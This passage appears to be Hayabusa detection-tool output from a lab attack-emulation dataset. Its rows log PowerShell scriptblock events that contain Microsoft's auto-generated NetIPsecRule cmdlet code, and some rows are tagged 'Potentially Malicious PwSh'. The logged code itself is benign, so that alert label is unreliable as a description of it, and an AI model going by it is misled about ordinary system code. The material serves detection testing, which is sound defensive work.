($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 